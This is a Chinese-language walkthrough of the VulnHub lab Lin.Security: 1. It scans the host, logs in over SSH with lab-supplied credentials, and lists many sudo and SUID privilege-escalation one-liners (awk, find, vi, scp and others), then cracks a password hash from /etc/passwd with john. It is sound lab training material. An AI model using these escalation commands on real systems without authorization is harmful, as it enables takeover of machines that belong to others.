靶机地址:Lin.Security: 1 ~ VulnHub
一、信息收集
步骤一:查看靶机的MAC地址
步骤二:在kali上使用nmap扫描主机:
arp-scan -l
对应MAC地址得到此靶机的IP:192.168.7.112
步骤三:查看开放的端口
nmap -sV -p- 192.168.7.112
在开放的端口中发现没有http服务的端口😭
步骤四:在没有思路的情况下只能去下载靶机的位置查看一下靶机描述,看有哪些提示
却发现描述中竟然给出了一个账号和密码:bob/secret
步骤五:在开放的端口中有ssh服务,尝试使用账号密码连接
步骤四:查看bob用户的id,发现是普通用户
二、权限提升
方法一:sudo提权
sudo -l #显示允许当前用户使用的命令
利用辅助网站:GTFOBins
1.ash命令提权
sudo ash
2.awk命令提权
sudo awk 'BEGIN {system("/bin/sh")}'
3.bash命令提权
sudo bash
4.csh命令提权
sudo csh
5.dash命令提权
sudo dash
6.ed命令提权
sudo ed
!/bin/sh
7.env命令提权
sudo env /bin/sh
8.expect命令提权
sudo expect -c 'spawn /bin/sh;interact'
9.find命令提权
sudo find . -exec /bin/sh \; -quit
10.ftp命令提权
sudo ftp
!/bin/sh
11.less命令tq
sudo less /etc/profile
!/bin/sh
12.man命令提权
sudo man man
!/bin/sh
13.more命令提权
TERM= sudo more /etc/profile
!/bin/sh
14.scp命令提权
TF=$(mktemp)
echo 'sh 0<&2 1>&2' > $TF
chmod +x "$TF"
sudo scp -S $TF x y:
15.socat命令提权
sudo socat stdin exec:/bin/sh
16.ssh命令提权
sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
17.vi命令提权
sudo vi -c ':!/bin/sh' /dev/null
18.zsh命令提权
sudo zsh
19.pico命令提权
sudo pico
^R^X
reset; sh 1>&0 2>&020.perl命令提权
sudo perl -e 'exec "/bin/sh";'
21.tclsh命令提权
sudo tclsh
exec /bin/sh <@stdin >@stdout 2>@stderr
22.git命令提权
sudo git -p help config
!/bin/sh
23.script命令提权
sudo script -q /dev/null
24.scp命令提权
TF=$(mktemp)
echo 'sh 0<&2 1>&2' > $TF
chmod +x "$TF"
sudo scp -S $TF x y:
方法二:suid提权
find / -user root -perm -4000 -exec ls -ldb {} \; #寻找suid文件
利用辅助网站:GTFOBins
task 1 /bin/bash -p
提权成功!
方法三:不安全配置提权/etc/passwd
cat /erc/passwd
发现一个超级权限用户,并显示了账号:insecurity以及加密后的密码:AzER3pBZh6WZE;解密:
echo "AzER3pBZh6WZE" > 1.txt #将密码写入1.txt文件中
john --wordlist=/usr/share/wordlists/rockyou.txt 1.txt #使用john进行解密
得到密码P@ssw0rd
切换insecurity用户,提权成功:
219
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
